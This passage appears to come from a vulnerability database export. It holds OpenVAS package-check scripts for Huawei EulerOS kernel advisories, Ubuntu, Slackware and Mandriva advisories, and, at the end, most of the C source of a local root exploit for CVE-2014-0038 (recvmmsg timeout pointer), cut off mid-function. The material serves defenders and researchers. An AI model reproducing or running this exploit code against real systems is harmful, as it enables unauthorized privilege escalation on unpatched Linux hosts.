value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~862.14.1.6_42\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-02-05T16:43:13", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1538)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-8650", "CVE-2014-0038", "CVE-2018-7566", "CVE-2016-3070", "CVE-2017-9059", "CVE-2015-1593", "CVE-2019-9003", "CVE-2018-1118", "CVE-2018-5848", "CVE-2017-15129", "CVE-2019-8912", "CVE-2017-16994", "CVE-2016-6136", "CVE-2017-18174", "CVE-2013-7339", "CVE-2014-2039", "CVE-2018-7754", "CVE-2013-6763", "CVE-2018-10124", "CVE-2018-3639"], "modified": "2020-02-05T00:00:00", "id": "OPENVAS:1361412562311220191538", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191538", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1538\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-6763\", \"CVE-2013-7339\", \"CVE-2014-0038\", \"CVE-2014-2039\", \"CVE-2015-1593\", \"CVE-2016-3070\", \"CVE-2016-6136\", \"CVE-2016-8650\", \"CVE-2017-15129\", \"CVE-2017-16994\", \"CVE-2017-18174\", \"CVE-2017-9059\", \"CVE-2018-10124\", \"CVE-2018-1118\", \"CVE-2018-3639\", \"CVE-2018-5848\", \"CVE-2018-7566\", \"CVE-2018-7754\", \"CVE-2019-8912\", \"CVE-2019-9003\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:08:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1538)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1538\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1538\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1538 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.(CVE-2017-16994)\n\nIn the Linux kernel before 4.7, the amd_gpio_remove function in drivers/pinctrl/pinctrl-amd.c calls the pinctrl_unregister function, leading to a double free.(CVE-2017-18174)\n\nIn the Linux kernel through 4.20.11, af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in sockfs_setattr.(CVE-2019-8912)\n\nA security flaw was found in the Linux kernel that an attempt to move page mapped by AIO ring buffer to the other node triggers NULL pointer dereference at trace_writeback_dirty_page(), because aio_fs_backing_dev_info.dev is 0.(CVE-2016-3070)\n\nThe NFSv4 implementation in the Linux kernel through 4.11.1 allows local users to cause a denial of service (resource consumption) by leveraging improper channel callback shutdown when unmounting an NFSv4 filesystem, aka a 'module reference and kernel daemon' leak.(CVE-2017-9059)\n\nWhen creating audit records for parameters to executed children processes, an attacker can convince the Linux kernel audit subsystem can create corrupt records which may allow an attacker to misrepresent or evade logging of executing commands.(CVE-2016-6136)\n\nA use-after-free vulnerability was found in a network namespaces code affecting the Linux kernel since v4.0-rc1 through v4.15-rc5. The function get_net_ns_by_id() does not check for the net::count value after it has found a peer network in netns_ids idr which could lead to double free and memory corruption. This vulnerability could allow an unprivileged local user to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although it is thought to be unlikely.(CVE-2017-15129)\n\nA NULL pointer dereference flaw was found in the rds_ib_laddr_check() function in the Linux kernel's implementation of Reliable Datagram Sockets (RDS). A local, unprivileged user could use this flaw to crash the system.(CVE-2013-7339)\n\nA flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key.(CVE-2016-8650)\n\nThe uio_mmap_physical function in drivers/uio/uio. ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:53:46", "description": "Pageexec reported a bug in the Linux kernel's recvmmsg syscall when called \nfrom code using the x32 ABI. An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or gain administrator \nprivileges.\n", "cvss3": {}, "published": "2014-01-31T00:00:00", "type": "ubuntu", "title": "Linux kernel vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-01-31T00:00:00", "id": "USN-2096-1", "href": "https://ubuntu.com/security/notices/USN-2096-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T12:53:46", "description": "Pageexec reported a bug in the Linux kernel's recvmsg syscall when called \nfrom code using the x32 ABI. An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or gain administrator \nprivileges.\n", "cvss3": {}, "published": "2014-01-31T00:00:00", "type": "ubuntu", "title": "Linux kernel (Saucy HWE) vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-01-31T00:00:00", "id": "USN-2095-1", "href": "https://ubuntu.com/security/notices/USN-2095-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T12:53:47", "description": "Pageexec reported a bug in the Linux kernel's recvmsg syscall when called \nfrom code using the x32 ABI. An unprivileged local user could exploit this \nflaw to cause a denial of service (system crash) or gain administrator \nprivileges.\n", "cvss3": {}, "published": "2014-01-31T00:00:00", "type": "ubuntu", "title": "Linux kernel (Raring HWE) vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0038"], "modified": "2014-01-31T00:00:00", "id": "USN-2094-1", "href": "https://ubuntu.com/security/notices/USN-2094-1", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:36:47", "description": "New kernel packages are available for Slackware 14.1 (64-bit) to fix a \nsecurity issue.\n\n\nHere are the details from the Slackware64 14.1 ChangeLog:\n\npatches/packages/linux-3.10.17-2/*:\n These are new kernels that fix CVE-2014-0038, a bug that can allow local\n users to gain a root shell.\n Be sure to reinstall LILO (run &quot;lilo&quot; as root) after upgrading the kernel\n packages, or on UEFI systems, copy the appropriate kernel to\n /boot/efi/EFI/Slackware/vmlinuz).\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/linux-3.10.17-2/\n\n\nMD5 signatures:\n\nSlackware x86_64 14.1 packages:\n0ac63878bb367d8565118fec3e41285b kernel-generic-3.10.17-x86_64-2.txz\nc53abd0c97637816f18a6552e1a652a9 kernel-headers-3.10.17-x86-2.txz\nfa203294f13daf77aa636180e36ffad4 kernel-huge-3.10.17-x86_64-2.txz\nce914034336a11cf7d87e588a12ae9e4 kernel-modules-3.10.17-x86_64-2.txz\n1fd28066bde78aa0fe558ac172ab4e22 kernel-source-3.10.17-noarch-2.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg kernel-*.txz\n\nThen, run &quot;lilo&quot; to reinstall the boot loader.\n\nIf there are no errors from LILO, reboot the system to begin using the\nnew kernel.", "cvss3": {}, "published": "2014-02-19T20:29:09", "type": "slackware", "title": "kernel", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-19T20:29:09", "id": "SSA-2014-050-03", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.324351", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2096-1\r\nJanuary 31, 2014\r\n\r\nlinux vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 13.10\r\n\r\nSummary:\r\n\r\nThe system could be made to crash or run programs as an administrator.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nPageexec reported a bug in the Linux kernel&#39;s recvmsg syscall when called\r\nfrom code using the x32 ABI. An unprivileged local user could exploit this\r\nflaw to cause a denial of service &#40;system crash&#41; or gain administrator\r\nprivileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 13.10:\r\n linux-image-3.11.0-15-generic 3.11.0-15.25\r\n linux-image-3.11.0-15-generic-lpae 3.11.0-15.25\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2096-1\r\n CVE-2014-0038\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.11.0-15.25\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "cvss3": {}, "published": "2014-02-01T00:00:00", "title": "[USN-2096-1] Linux kernel vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2014-02-01T00:00:00", "id": "SECURITYVULNS:DOC:30268", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30268", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2014:038\r\n http://www.mandriva.com/en/support/security/\r\n _______________________________________________________________________\r\n\r\n Package : kernel\r\n Date : February 17, 2014\r\n Affected: Business Server 1.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities has been found and corrected in the Linux\r\n kernel:\r\n \r\n The compat_sys_recvmmsg function in net/compat.c in the Linux kernel\r\n before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users\r\n to gain privileges via a recvmmsg system call with a crafted timeout\r\n pointer parameter &#40;CVE-2014-0038&#41;.\r\n \r\n The restore_fpu_checking function in\r\n arch/x86/include/asm/fpu-internal.h in the Linux kernel before 3.12.8\r\n on the AMD K7 and K8 platforms does not clear pending exceptions\r\n before proceeding to an EMMS instruction, which allows local users\r\n to cause a denial of service &#40;task kill&#41; or possibly gain privileges\r\n via a crafted application &#40;CVE-2014-1438&#41;.\r\n \r\n The yam_ioctl function in drivers/net/hamradio/yam.c in the Linux\r\n kernel before 3.12.8 does not initialize a certain structure member,\r\n which allows local users to obtain sensitive information from kernel\r\n memory by leveraging the CAP_NET_ADMIN capability for an SIOCYAMGCFG\r\n ioctl call &#40;CVE-2014-1446&#41;.\r\n \r\n The updated packages provides a solution for these security issues.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1438\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1446\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Business Server 1/X86_64:\r\n d1faf9544075ff4790e29edd6e7061f6 mbs1/x86_64/cpupower-3.4.80-1.1.mbs1.x86_64.rpm\r\n 3498721d639bf646ed55e2903ce728e4 mbs1/x86_64/kernel-firmware-3.4.80-1.1.mbs1.noarch.rpm\r\n f9927f4b1512a26d874a82a99636fb09 mbs1/x86_64/kernel-firmware-3.4.80-1.1.mbs1.src.rpm\r\n e874467839b96e04bebd0c5b24f31fc3 mbs1/x86_64/kernel-headers-3.4.80-1.1.mbs1.src.rpm\r\n 208f74225f3d18189a871ac308c8df5b mbs1/x86_64/kernel-headers-3.4.80-1.1.mbs1.x86_64.rpm\r\n e1f82c2b50db46cdb4db2daa933f7173 mbs1/x86_64/kernel-server-3.4.80-1.1.mbs1.x86_64.rpm\r\n ed0d8eed6c61553e73121117bcfc978f mbs1/x86_64/kernel-server-devel-3.4.80-1.1.mbs1.x86_64.rpm\r\n 00ca38d2289182149e8f43c6871711e8 mbs1/x86_64/kernel-source-3.4.80-1.mbs1.noarch.rpm\r\n 429b6e48ee63a03a83577a710bc5368d mbs1/x86_64/lib64cpupower0-3.4.80-1.1.mbs1.x86_64.rpm\r\n a6e3898905be2a8d7ded39a5312f7670 mbs1/x86_64/lib64cpupower-devel-3.4.80-1.1.mbs1.x86_64.rpm\r\n 086bc3e49adec4147aa1138ae5d5245c mbs1/x86_64/perf-3.4.80-1.1.mbs1.x86_64.rpm \r\n f5a65feb515d65f9f1f526f6294af2c3 mbs1/SRPMS/cpupower-3.4.80-1.1.mbs1.src.rpm\r\n 56fafb86f60233b29fcd8d42d35e4678 mbs1/SRPMS/kernel-server-3.4.80-1.1.mbs1.src.rpm\r\n 715647161acd9ec082c0a2fef0f35fc3 mbs1/SRPMS/kernel-source-3.4.80-1.mbs1.src.rpm\r\n cc72e360fa32823a575d1c9536fdecc3 mbs1/SRPMS/perf-3.4.80-1.1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_&#40;at&#41;_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n &lt;security*mandriva.com&gt;\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFTAiBGmqjQ0CJFipgRAiryAKCz6vqRlzaZ+l0B6QyuMb95i8UVoACgjAGx\r\nF7TlfjN081P00FfeKN47Je4=\r\n=osPP\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "cvss3": {}, "published": "2014-02-18T00:00:00", "title": "[ MDVSA-2014:038 ] kernel", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2014-1446", "CVE-2014-1438"], "modified": "2014-02-18T00:00:00", "id": "SECURITYVULNS:DOC:30313", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30313", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:53", "description": "ptrace information leakage, debug functions privilege escalation, cprng weak PRNG, networking dissector DoS, multiple integer overflows, buffer overlows in WiMax, USB and different devices drivers, UDP fragmentation offload uninitialized memory, privilege escalations. NAT conntrack information leakage.", "edition": 1, "cvss3": {}, "published": "2014-03-31T00:00:00", "title": "Linux kernel security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2013-7027", "CVE-2013-4345", "CVE-2014-0038", "CVE-2013-4513", "CVE-2013-7270", "CVE-2013-7265", "CVE-2013-6383", "CVE-2013-6378", "CVE-2013-4515", "CVE-2013-2929", "CVE-2013-4511", "CVE-2014-1874", "CVE-2013-4592", "CVE-2013-4516", "CVE-2013-7267", "CVE-2013-7266", "CVE-2013-7264", "CVE-2014-1446", "CVE-2014-2038", "CVE-2013-6368", "CVE-2013-6382", "CVE-2013-6367", "CVE-2013-7263", "CVE-2013-4514", "CVE-2013-7269", "CVE-2013-2930", "CVE-2013-7271", "CVE-2013-6380", "CVE-2013-7268", "CVE-2014-1438", "CVE-2013-7281", "CVE-2013-4587", "CVE-2013-6763", "CVE-2013-4348", "CVE-2013-4470", "CVE-2013-4588", "CVE-2013-4299", "CVE-2014-1690", "CVE-2013-7026"], "modified": "2014-03-31T00:00:00", "id": "SECURITYVULNS:VULN:13475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13475", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "kitploit": [{"lastseen": "2019-10-18T16:36:53", "description": "[  ](<https://1.bp.blogspot.com/-uHgAxPAWJ5o/UvE5ir-tCzI/AAAAAAAABvU/t5v10tcpkc8/s1600/linux_exploit.jpg>)\n\n \nCVE: [ 2014-0038 ](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0038>) \nAuthor: saelo \nPublished: 2014-02-02 \n \n\n \n \n /*\n * Local root exploit for CVE-2014-0038.\n *\n * https://raw.github.com/saelo/cve-2014-0038/master/timeoutpwn.c\n *\n * Bug: The X86_X32 recvmmsg syscall does not properly sanitize the timeout pointer\n * passed from userspace.\n *\n * Exploit primitive: Pass a pointer to a kernel address as timeout for recvmmsg,\n * if the original byte at that address is known it can be overwritten\n * with known data.\n * If the least significant byte is 0xff, waiting 255 seconds will turn it into a 0x00.\n *\n * Restrictions: The first long at the passed address (tv_sec) has to be positive\n * and the second long (tv_nsec) has to be smaller than 1000000000.\n *\n * Overview: Target the release function pointer of the ptmx_fops structure located in\n * non initialized (and thus writable) kernel memory. Zero out the three most\n * significant bytes and thus turn it into a pointer to an address mappable in\n * user space.\n * The release pointer is used as it is followed by 16 0x00 bytes (so the tv_nsec\n * is valid).\n * Open /dev/ptmx, close it and enjoy.\n *\n * Not very beautiful but should be fairly reliable if symbols can be resolved.\n *\n * Tested on Ubuntu 13.10\n *\n * gcc timeoutpwn.c -o pwn && ./pwn\n *\n * Written by saelo\n */\n #define _GNU_SOURCE\n #include <netinet/ip.h>\n #include <stdio.h>\n #include <stdlib.h>\n #include <time.h>\n #include <string.h>\n #include <unistd.h>\n #include <fcntl.h>\n #include <sys/socket.h>\n #include <sys/stat.h>\n #include <sys/syscall.h>\n #include <sys/wait.h>\n #include <sys/mman.h>\n \n #define __X32_SYSCALL_BIT 0x40000000\n #undef __NR_recvmmsg\n #define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)\n \n #define BUFSIZE 200\n #define PAYLOADSIZE 0x2000\n #define FOPS_RELEASE_OFFSET 13*8\n \n /*\n * Adapt these addresses for your need.\n * see /boot/System.map* or /proc/kallsyms\n * These are the offsets from ubuntu 3.11.0-12-generic.\n */\n #define PTMX_FOPS 0xffffffff81fb30c0LL\n #define TTY_RELEASE 0xffffffff8142fec0LL\n #define COMMIT_CREDS 0xffffffff8108ad40LL\n #define PREPARE_KERNEL_CRED 0xffffffff8108b010LL\n \n typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\n typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n \n /*\n * Match signature of int release(struct inode*, struct file*).\n *\n * See here: http://grsecurity.net/~spender/exploits/enlightenment.tgz\n */\n int __attribute__((regparm(3)))\n kernel_payload(void* foo, void* bar)\n {\n _commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\n _prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\n \n *((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1; // restore pointer\n commit_creds(prepare_kernel_cred(0));\n \n return -1;\n }\n \n /*\n * Write a zero to the byte at then given address.\n * Only works if the current value is 0xff.\n */\n void zero_out(long addr)\n {\n int sockfd, retval, port, pid, i;\n struct sockaddr_in sa;\n char buf[BUFSIZE];\n struct mmsghdr msgs;\n struct iovec iovecs;\n \n srand(time(NULL));\n \n port = 1024 + (rand() % (0x10000 - 1024));\n \n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\n if (sockfd == -1) {\n perror(\"socket()\");\n exit(EXIT_FAILURE);\n }\n \n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(port);\n if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {\n perror(\"bind()\");\n exit(EXIT_FAILURE);\n }\n \n memset(&msgs, 0, sizeof(msgs));\n iovecs.iov_base = buf;\n iovecs.iov_len = BUFSIZE;\n msgs.msg_hdr.msg_iov = &iovecs;\n msgs.msg_hdr.msg_iovlen = 1;\n \n /*\n * start a seperate process to send a udp message after 255 seconds so the syscall returns,\n * but not after updating the timout struct and writing the remaining time into it.\n * 0xff - 255 seconds = 0x00\n */\n printf(\"clearing byte at 0x%lx\\n\", addr);\n pid = fork();\n if (pid == 0) {\n memset(buf, 0x41, BUFSIZE);\n \n if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {\n perror(\"socket()\");\n exit(EXIT_FAILURE);\n }\n \n sa.sin_family = AF_INET;\n sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);\n sa.sin_port = htons(port);\n \n printf(\"waiting 255 seconds...\\n\");\n for (i = 0; i < 255; i++) {\n if (i % 10 == 0)\n printf(\"%is/255s\\n\", i);\n sleep(1);\n }\n \n printf(\"waking up parent...\\n\");\n sendto(sockfd, buf, BUFSIZE, 0, &sa, sizeof(sa));\n exit(EXIT_SUCCESS);\n } else if (pid 